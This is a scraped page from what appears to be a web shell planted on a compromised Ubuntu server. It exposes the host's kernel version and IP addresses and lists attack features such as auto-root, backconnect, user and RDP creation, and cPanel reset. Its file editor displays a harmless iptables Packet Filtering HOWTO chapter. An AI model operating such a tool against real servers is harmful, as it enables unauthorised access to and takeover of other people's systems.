Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.137.175.166
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
iptables /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
NAT-HOWTO-1.html
1.05
KB
-rw-r--r--
NAT-HOWTO-10.html
2.39
KB
-rw-r--r--
NAT-HOWTO-11.html
836
B
-rw-r--r--
NAT-HOWTO-2.html
4.17
KB
-rw-r--r--
NAT-HOWTO-3.html
1.34
KB
-rw-r--r--
NAT-HOWTO-4.html
4.22
KB
-rw-r--r--
NAT-HOWTO-5.html
4.95
KB
-rw-r--r--
NAT-HOWTO-6.html
8.13
KB
-rw-r--r--
NAT-HOWTO-7.html
1.22
KB
-rw-r--r--
NAT-HOWTO-8.html
1.04
KB
-rw-r--r--
NAT-HOWTO-9.html
1.97
KB
-rw-r--r--
NAT-HOWTO.html
2.53
KB
-rw-r--r--
packet-filtering-HOWTO-1.html
1.77
KB
-rw-r--r--
packet-filtering-HOWTO-10.html
2.44
KB
-rw-r--r--
packet-filtering-HOWTO-11.html
3.58
KB
-rw-r--r--
packet-filtering-HOWTO-2.html
1.48
KB
-rw-r--r--
packet-filtering-HOWTO-3.html
5.57
KB
-rw-r--r--
packet-filtering-HOWTO-4.html
2.07
KB
-rw-r--r--
packet-filtering-HOWTO-5.html
1.53
KB
-rw-r--r--
packet-filtering-HOWTO-6.html
3.35
KB
-rw-r--r--
packet-filtering-HOWTO-7.html
34.71
KB
-rw-r--r--
packet-filtering-HOWTO-8.html
1.35
KB
-rw-r--r--
packet-filtering-HOWTO-9.html
2.21
KB
-rw-r--r--
packet-filtering-HOWTO.html
2.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : packet-filtering-HOWTO-11.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <META NAME="GENERATOR" CONTENT="LinuxDoc-Tools 0.9.72"> <TITLE>Linux 2.4 Packet Filtering HOWTO: Advice on Packet Filter Design</TITLE> <LINK HREF="packet-filtering-HOWTO-10.html" REL=previous> <LINK HREF="packet-filtering-HOWTO.html#toc11" REL=contents> </HEAD> <BODY> Next <A HREF="packet-filtering-HOWTO-10.html">Previous</A> <A HREF="packet-filtering-HOWTO.html#toc11">Contents</A> <HR> <H2><A NAME="s11">11.</A> <A HREF="packet-filtering-HOWTO.html#toc11">Advice on Packet Filter Design</A></H2> <P>Common wisdom in the computer security arena is to block everything, then open up holes as neccessary. This is usually phrased `that which is not explicitly allowed is prohibited'. I recommend this approach if security is your maximal concern.</P> <P>Do not run any services you do not need to, even if you think you have blocked access to them.</P> <P>If you are creating a dedicated firewall, start by running nothing, and blocking all packets, then add services and let packets through as required.</P> <P>I recommend security in depth: combine tcp-wrappers (for connections to the packet filter itself), proxies (for connections passing through the packet filter), route verification and packet filtering. Route verification is where a packet which comes from an unexpected interface is dropped: for example, if your internal network has addresses 10.1.1.0/24, and a packet with that source address comes in your external interface, it will be dropped. This can be enabled for one interface (ppp0) like so:</P> <P> <BLOCKQUOTE><CODE> <PRE> # echo 1 > /proc/sys/net/ipv4/conf/ppp0/rp_filter # </PRE> </CODE></BLOCKQUOTE> </P> <P>Or for all existing and future interfaces like this:</P> <P> <BLOCKQUOTE><CODE> <PRE> # for f in /proc/sys/net/ipv4/conf/*/rp_filter; do # echo 1 > $f # done # </PRE> </CODE></BLOCKQUOTE> </P> <P>Debian does this by default where possible. If you have asymmetric routing (ie. you expect packets coming in from strange directions), you will want to disable this filtering on those interfaces.</P> <P>Logging is useful when setting up a firewall if something isn't working, but on a production firewall, always combine it with the `limit' match, to prevent someone from flooding your logs.</P> <P>I highly recommend connection tracking for secure systems: it introduces some overhead, as all connections are tracked, but is very useful for controlling access to your networks. You may need to load the `ip_conntrack.o' module if your kernel does not load modules automatically, and it's not built into the kernel. If you want to accurately track complex protocols, you'll need to load the appropriate helper module (eg. `ip_conntrack_ftp.o').</P> <P> <BLOCKQUOTE><CODE> <PRE> # iptables -N no-conns-from-ppp0 # iptables -A no-conns-from-ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT # iptables -A no-conns-from-ppp0 -m state --state NEW -i ! ppp0 -j ACCEPT # iptables -A no-conns-from-ppp0 -i ppp0 -m limit -j LOG --log-prefix "Bad packet from ppp0:" # iptables -A no-conns-from-ppp0 -i ! ppp0 -m limit -j LOG --log-prefix "Bad packet not from ppp0:" # iptables -A no-conns-from-ppp0 -j DROP # iptables -A INPUT -j no-conns-from-ppp0 # iptables -A FORWARD -j no-conns-from-ppp0 </PRE> </CODE></BLOCKQUOTE> </P> <P>Building a good firewall is beyond the scope of this HOWTO, but my advice is `always be minimalist'. See the Security HOWTO for more information on testing and probing your box.</P> <HR> Next <A HREF="packet-filtering-HOWTO-10.html">Previous</A> <A HREF="packet-filtering-HOWTO.html#toc11">Contents</A> </BODY> </HTML>
Close
